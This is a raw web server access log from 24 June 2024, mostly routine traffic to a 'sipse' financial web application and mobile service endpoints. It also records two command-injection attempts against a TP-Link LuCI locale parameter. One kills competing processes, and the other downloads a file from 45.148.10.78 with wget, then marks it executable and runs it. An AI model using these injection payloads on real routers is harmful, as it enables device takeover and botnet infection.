186.102.6.16 - - [24/Jun/2024:06:18:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18BoGMgGNyYG22qPBGsnxmH9tie7T2bhvYQ5ZEynD23o1w3IWyeS3fMXx0Y2LJp0/XQVpKf9iHeDszgEplpyqVMlUATFZmqL+fHqR6tR1bRFpG+aAYi0zTf/kTCNCmYw+WjTr1Bs1lQNB1wRbs/KYKyA7FzNCj5NDPJLDU8bzR4YNAGdbGZ7R2fhPQcUV3F0F5+HszE78G8NnmRx1q+85+UbAHyHHBEErrvuEoUc2oAfPxIFbodQ8O7+0YgShZe2xyRRc6zRpNBV8Fafbnxrk7JAvqrQW0c0s6pk+ImvssCbIJnTeot/A6CIxe398/yh4tC703X6uNGLVu2VRFpTb5/etq4NK3olZx5ye/3AmX9efEoA0BBjsFZVuW8XYqqaCkO3Fevc/jEKt0X8URWRCpehtgQpSMDtpRuYveKQfToEQ9VeJ8Bg5xkslptjKlD1GQWbDFXxPwD/8xvAA6oCq/NJ8GjCzxVAAPdAck5vo6HHeT9IDnvTBnALbvu9sGd2xJH3f8Zl64SVaQCqULc/+ReT/1nGoy5V1sgewEG2jUq3hLaRPnSZNLiO2R2+sqZg+bfGjFGb+Px/NIpSdbgL1gzAD8FAKM661DM3KYc1mk8iSGB39l0o3qMWslOpVC3ASQao81D+intiaFBE1JLyW8iFP2rKRaSYVZneHsPt7EBf9xfkB7vgv5CU92nx8j49fiqtObZKBSOvleKcppkgEdEW/e5qnwA8IbYh6sOyt5rPs3ZMtozM8MtzgIAY2U2ZFBkj6nT7gU5M8yLW94KCVxZ60GyoubhCOamfZVsZgJVDoAEXTV/v5jlx3d1te7cS6CrLC4IVHcGpljgNnCnGMKpyHZ5X8cYxSdc79Y8QuHGglBDII1rnzHxdHImSyFbYhFgwdTHshuEB0Hi9E19R1Cio5+Xqms6pxPtyFNrg57cVhPZrnuG4944t7Lrry1mjWTFRUY5AAVCvI7bCQq6ciEEtPuutiCEFECkp5Tl53v83u58O2jJu2ft5QNCDlcL2kR4a+/Ij6Qf1Mie1y4XYAjVFgBjcKl8f0vECJZ0Xo8pdLY6m8ftRBuVawNf5TgrkpYrGpTkvcC3n9o+ujFNIhY6tVT6f668lshrT0hlwQnjxcR/5D03FWJTGg4vySHXM7uqKlnsU0UvlzzIKTiCiVM1UoCZ8bstrLNpNdkAMW0ipXDp4Lh7VGbwJrJ/FxLsrNQdpPffOrSXJbcaydH2wGAYW9TLILmW7FvxrKMebgvsdpHITPUN2fT0omBeVYAmGkO6lxjHkJiasLayMVVoKM4hLHziA3fyGqz574uqdY3D7eOOvi1/frKm+WU0ZTBXQD/237I7BnpsqirR5vOMJGz3C2OvCdCZuzsr3ZWN7g4VwokP7Tr+93W2TbnEWCnOWS9zcVH+JDa1o0Y/7nJdWkIGh9bHm6jPAVrhiGiSNyRyFemjqMetRo+HERSuPRnZPGSFqtF+6VscsjYpRiie29l93SfpNS7qVXqi0VJOXp6q4yFJq8cBZHz2Y8TZyt5Pv1FsoPQQ/VS40f38DTnvxgI2cGxYXUWuwkUw5BtxdLA1LhCZnxqhS6NRWBcVn1qY5Ch2XXhW7lXrzpzv0ewRajSarGB5Of1I8A8Stu9d116Xg9lb+Lc72PNTZQmoljywIQzWdW3LwJlplNO7eqarlDvjCIqquxUL1DGVuZtzx+73Nv1edU55pRJ3gX+gCmQ7mh5vQ5+iAJjXi2TgA+X3YpRZRcsXyV1mYGkzGTQBheB/yPEXwRQ55dRR&u=U2FsdGVkX19nFLJ2B5lfJWOjZ3cc7ZRF8PsUuGyiadvROulyrUkbE0GCQhXShaTU&y=U2FsdGVkX1+IO1cIpxYLJpq0XTXqDTbkKxfK/evWNxM+I2CMmaDhLOoQj+Yq7W6T HTTP/1.1" 200 523
186.102.6.16 - - [24/Jun/2024:06:18:47 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18TW60mOn/PZ4CU6TJTlkGJuWU6373njG82ZXb/nSl0kiVSYKb3Y+q9wAzSPK7HLOFT81w6r7G7oY81r1xpgdeCFecETbJ1vp7fZW/P6dtMraHpswv3gUrSViZOx+DvQUDfKJIK3/KPg4Fs0zh9wQwqyC3Ojhha0nTffocGdmcEiHzHbLT5B2a2cbXbyBJHqMk+bfajzAecNSaeuh5mQ9NTdouEyVZI39JvV92EiOSuEpkuglMuTjiDmk4T84TMg5kGF/Z5v+WyVWmG4Xg78m3uqvR6DsWYgOWWOqoToZiCnV1qeQ6qFawOdcXeZ4HPy5FnoHGw2jOxzuvI1g9deIW+XvNhwiPgEnKkL5U/WpPyCY3tdhPgEkSpG82IT9iVmVeYLorxUfP1y3HtlPrOIEKPShz/ez7bJMFtcCcaPWcW1biGKoPwhogfLM1HQ7+nvWkmsmmBejCZyTj4biMsN18+e15i83CBYPysqWWGYAglclnNahsqKHnly3fjM4spdhbuFnPLXbHOYr2VxOndK51kjMiECB1mkKEDflUBHyBjnWCHEno5DR+W9yAaBgrxBIJlmzhsR6VxszyAiXjVDYrq0x0Hj3QC/N+E/VcdeICFrJx+cnJfzo3e5KP7rWIb0bOAifjnhK5r6ypY6O4qLKIqfeawrw13f+3VA32QajVPjlIK5YVupSN3bRZFc4VfxgAlXgIwdQmm+wCM1spqhSQLI24oCirNcAzKWa3h2phe0TcjrrRr7NnY&u=U2FsdGVkX19nFLJ2B5lfJWOjZ3cc7ZRF8PsUuGyiadvROulyrUkbE0GCQhXShaTU&y=U2FsdGVkX1+IO1cIpxYLJpq0XTXqDTbkKxfK/evWNxM+I2CMmaDhLOoQj+Yq7W6T HTTP/1.1" 200 208
186.102.6.16 - - [24/Jun/2024:06:18:47 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/LIalg6Vm1xSmEO9gD+W26eDeeCi5nFqz3nFPayyDZH14e+uNbiOPzeFVjteH6c1wMd9/hOnun/A== HTTP/1.1" 200 30244
172.22.2.4 - - [24/Jun/2024:06:17:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
181.52.223.52 - - [24/Jun/2024:06:19:00 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.52.223.52 - - [24/Jun/2024:06:19:00 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12401
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
181.52.223.52 - - [24/Jun/2024:06:19:01 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
181.52.223.52 - - [24/Jun/2024:06:19:09 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16900
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/css/v_mergente.css HTTP/1.1" 200 1505
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
181.52.223.52 - - [24/Jun/2024:06:19:10 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
181.52.223.52 - - [24/Jun/2024:06:19:12 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:12 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2073
181.52.223.52 - - [24/Jun/2024:06:19:13 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 39081
181.52.223.52 - - [24/Jun/2024:06:19:14 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 12878
201.245.192.253 - - [24/Jun/2024:06:19:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
181.52.223.52 - - [24/Jun/2024:06:19:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 163381
181.52.223.52 - - [24/Jun/2024:06:19:22 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 633407
201.245.192.253 - - [24/Jun/2024:06:19:40 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37032
181.59.244.61 - - [24/Jun/2024:06:19:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40948
181.59.244.61 - - [24/Jun/2024:06:19:58 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:19:58 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:19:58 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:19:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:19:58 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:19:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:19:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:19:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:19:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:19:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:00 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.52.223.52 - - [24/Jun/2024:06:19:35 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1028809
181.59.244.61 - - [24/Jun/2024:06:20:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.59.244.61 - - [24/Jun/2024:06:20:04 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 34259
181.52.223.52 - - [24/Jun/2024:06:19:39 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1648147
141.98.83.197 - - [24/Jun/2024:06:20:08 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
181.59.244.61 - - [24/Jun/2024:06:20:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 13120
141.98.83.197 - - [24/Jun/2024:06:20:09 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [24/Jun/2024:06:20:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37044
181.59.244.61 - - [24/Jun/2024:06:20:12 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 162634
181.59.244.61 - - [24/Jun/2024:06:20:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:20:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:20:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.59.244.61 - - [24/Jun/2024:06:20:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.52.223.52 - - [24/Jun/2024:06:19:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 1648147
201.245.192.253 - - [24/Jun/2024:06:20:20 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
186.102.6.16 - - [24/Jun/2024:06:20:21 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/c0Beb4/q/HQtpT82qqklR6B4kz5CdmTT8G3NGXO2nAPIng0oUUdH4Dy0Ir2cNdu3c+MsFDjpIRjf7Ip3c/xAIXH5ySppFoQ4Lj2rdJGXj00rJttIfpunCNEO0LagBJSJYw34/39Tg0KLR9X0995szGWkLtBzHk2tO4mAaQW1smrWV49E+hwEubApZ7qcbjOY4/HMZSKFBMW39xwfn/tfZhRZ4LR5mod/U5FmitDZ2EtteGr2uzlp0Qk2wuOGTB9XFMeegxnAL9g==&u=U2FsdGVkX19nFLJ2B5lfJWOjZ3cc7ZRF8PsUuGyiadvROulyrUkbE0GCQhXShaTU&y=U2FsdGVkX1+IO1cIpxYLJpq0XTXqDTbkKxfK/evWNxM+I2CMmaDhLOoQj+Yq7W6T HTTP/1.1" 200 26
186.102.6.16 - - [24/Jun/2024:06:20:22 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX19nFLJ2B5lfJWOjZ3cc7ZRF8PsUuGyiadvROulyrUkbE0GCQhXShaTU&y=U2FsdGVkX1+IO1cIpxYLJpq0XTXqDTbkKxfK/evWNxM+I2CMmaDhLOoQj+Yq7W6T HTTP/1.1" 200 26
186.102.6.16 - - [24/Jun/2024:06:20:22 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX195u3Cc1MHd8FCE025NiiephsHwh5YRICnEJqjlHo8o/Y2JygdzUExgIyf1juZw6aIRkO+QBUZ5iJ+nDDWtJSRumjdF22YIZ7B0YNUWUDp97vSd1onTJ8TwJZU/Q3qMVFRrQQhbbeR8zjLu1NEV0BY8eJA9salott8=&u=U2FsdGVkX19nFLJ2B5lfJWOjZ3cc7ZRF8PsUuGyiadvROulyrUkbE0GCQhXShaTU&y=U2FsdGVkX1+IO1cIpxYLJpq0XTXqDTbkKxfK/evWNxM+I2CMmaDhLOoQj+Yq7W6T HTTP/1.1" 200 26
186.102.6.16 - - [24/Jun/2024:06:20:22 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18ZLrW769I2OxAYC+WMYqzzFI5xaA5HlE31wGU0G6QCGN3Dt4Yy71TMtqPfFd0XW4MFz6eSOlGQolbc4DzFTc4RI4VjPwjm48IamRlyj/thixMRDfT5uoxnz55nZwMYMtZBsWvMdcj4sYhWVTgnH0Fy+DaAphb7aNM=&u=U2FsdGVkX19nFLJ2B5lfJWOjZ3cc7ZRF8PsUuGyiadvROulyrUkbE0GCQhXShaTU&y=U2FsdGVkX1+IO1cIpxYLJpq0XTXqDTbkKxfK/evWNxM+I2CMmaDhLOoQj+Yq7W6T HTTP/1.1" 200 26
186.102.6.16 - - [24/Jun/2024:06:20:22 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/9o3PhvdluMZJNRM3K/Q5hfE+bkfGhHFG0sqrc/cxVAVJa0ze94LA/j+ei4nbNu84Zqv8ENXGznlzPk9HbSosDM/ydBPTcbPTRuNpCN1/DWXQiOxuZWmJ+LtgtdX/70gcUl1ma3tKRmmPSM4L5xzxkh0MUNB2HXkI=&u=U2FsdGVkX19nFLJ2B5lfJWOjZ3cc7ZRF8PsUuGyiadvROulyrUkbE0GCQhXShaTU&y=U2FsdGVkX1+IO1cIpxYLJpq0XTXqDTbkKxfK/evWNxM+I2CMmaDhLOoQj+Yq7W6T HTTP/1.1" 200 26
